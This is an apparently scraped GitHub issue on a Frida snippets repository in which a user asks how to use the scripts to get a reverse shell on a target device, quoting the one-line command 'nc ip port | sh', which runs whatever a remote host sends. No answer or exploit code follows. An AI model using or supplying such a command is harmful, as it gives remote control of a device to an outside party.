iddoeldor / frida-snippets

Hand-crafted Frida examples

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

How do I get a reverse shell from these python scripts

ChillVibesMushroom opened this issue · comments

I just got a course in regards to Frida and I was wondering how I would use these scripts to get a shell in the device I want to run the toybox command

nc ip port | sh

I know it is possible I just needed guidance